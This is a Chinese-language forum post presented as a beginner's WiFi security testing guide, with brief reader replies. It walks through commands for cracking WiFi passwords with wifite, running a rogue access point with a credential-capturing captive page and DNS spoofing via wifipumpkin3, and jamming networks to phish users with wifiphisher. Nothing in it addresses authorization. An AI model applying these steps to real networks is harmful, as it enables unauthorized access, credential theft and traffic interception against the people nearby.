梦幻的彼岸 发表于 2023-2-27 10:25:05

WIFI安全测试手册:入门篇

本帖最后由 梦幻的彼岸 于 2023-2-27 10:46 编辑

准备工作
外置网卡:磊科(netcore)NW392

芯片信息

当前此设备需手动安装驱动

apt install realtek-rtl88xxau-dkms //需输入y进行继续安装
注意:由于网络速度,进度69%、85%可能需要等待一段时间

安装完毕,重启


无线网卡状态查询
iwconfig    //查看无线信息

Mode:Monitor 可监听附件无线设备通讯
Mode:Managed 可连接附件无线设备
更改网卡工作模式:iwconfig 网卡名称 mode 工作模式,
测试常用模式例举如下
iwconfig wlan0 mode Managed
iwconfig wlan0 mode Monitor

实战讲解
破解WIFI密码,使用wifite工具进行测试
新版本的wifite:https://github.com/kimocoder/wifite2
安装与启动方法:
$ git clone https://github.com/kimocoder/wifite2.git
$ pip3 install -r requirements.txt//安装依赖,正常情况下kali系统内无需执行此命令(依赖满足)
$ cd wifite2
$ sudo ./wifite.py
$ sudo python3 setup.py install //安装到系统选项
备注:当前kali内置wifite版本没有GitHub新 (攻击操作需root权限运行wifite命令)



输入 -h 参数运行显示wifite的帮助信息


输入-h -v参数运行以显示更多帮助信息


此输出信息可查看默认密码包保存路径
GitHub---当前路径wordlist-probable.txt

Kali---usr/share/dict/wordlist-probable.txt


[*]默认攻击方式:
无参数以root权限运行wifite
检测运行设备的无线网卡情况并将无线网卡的模式改为monitor(以检测附近的WIFI通信)


开始自动扫描附件的WIFI设备,直达输入Ctrl+c 暂停


输入Ctrl+c暂停扫描并根据测试目的输入对应参数以开始WIFI密码破解
破解指定设备:输入WiFi对应的序号即可
所有设备:输入“all”参数



[*]攻击指定设备:
可通过 -e参数加设备essid信息进行指定操作


常用组合参数讲解:
备注:这里是在wifite文件夹路径下执行的命令
sudo ./wifite.py --kill -i wlan0 -mac -pow 50--dict /password.txt
杀死冲突进程使用wlan0网卡开启mac地址随机化后使用指定字典攻击信号强度大于或等于50的WIFI设备


欺骗攻击,使用wifipumpkin3工具进行测试
GitHub:https://github.com/P0cL4bs/wifipumpkin3
在线安装手册:https://wifipumpkin3.github.io/docs/getting-started#installation
在kali系统上的安装示例

sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install
注意:scapy警告问题


更新scapy版本
https://github.com/secdev/scapy





[*]创建一个WiFi

set interface wlan0
# 设置将要创建的接入点的名称
set ssid TestWIFI
# 设置noproxy plguin
set proxy noproxy
# 忽略来自pydns_server的所有日志
ignore pydns_server
start

//pumpkinproxy - 用于拦截TCP协议的网络流量的代理。
//captiveflask - 允许阻止用户访问互联网,直到他们打开登录页面。
//noproxy - 运行无代理的重定向流量

搜索到创建的wifi




访问测试网址输入账号密码登录测试
http://testphp.vulnweb.com/login.php






[*]便捷启动脚本
将之前测试的命令保存到以pulp后缀的文件
以--pulp参数加载



[*]代理模式设置


默认 pumpkinproxy //可用于拦截模式的代理
开启代理插件


关闭代理插件


captiveflask代理模式 //连接WIFI后会弹窗的特定页面






捕获到的提交内容


DNS劫持

set interface wlan0
set ssid TestWIFI
set proxy noproxy
ignore pydns_server
use spoof.dns_spoof
set domains wifitest.com
set redirectTo 192.168.70.133
back
start


其它常用命令参数
show //显示可用攻击模块

jobs //显示正在后台运行的攻击模块

ap //显示创建的WIFI信息

proxies //显示可用代理模式与功能

security //WIFI安全模式,可设置密码与保护方式

更改密码

钓鱼攻击,使用Wifiphisher工具进行测试
GitHub:https://github.com/wifiphisher/wifiphisher
注意:需有两个无线设备

自动扫描附件的WIFI设备

选择要测试的目标Enter确认,这里选择验证欺骗模式进行演示
1 - Network Manager Connect

生成需要认证的WIFI



干扰正常WIFI并自动连接生成的WIFI



显示攻击情况

ESC退出并会在终端显示捕获的输入信息


xukefei 发表于 2023-2-27 11:23:24

非常厉害,搞个硬件测试下。谢谢分享

为生活而战 发表于 2023-2-27 23:24:26

貌似是在进行Wifi钓鱼。。

乐活 发表于 2023-2-28 09:40:33

过来学习,多谢分享

1otus 发表于 2023-3-3 23:40:56

感谢楼主分享

mfkusrai 发表于 2023-3-4 12:46:23

好文,感谢!

mfkusrai 发表于 2023-3-4 12:46:54

为生活而战 发表于 2023-2-27 23:24
貌似是在进行Wifi钓鱼。。

具体怎么钓?

xiaomils 发表于 2023-3-5 18:41:28

楼主太厉害了!!

f88u8 发表于 2023-3-8 21:53:16

膜拜大神,感谢

xwawa 发表于 2023-3-9 05:48:58

学习一下,谢谢楼主
页: [1] 2
查看完整版本: WIFI安全测试手册:入门篇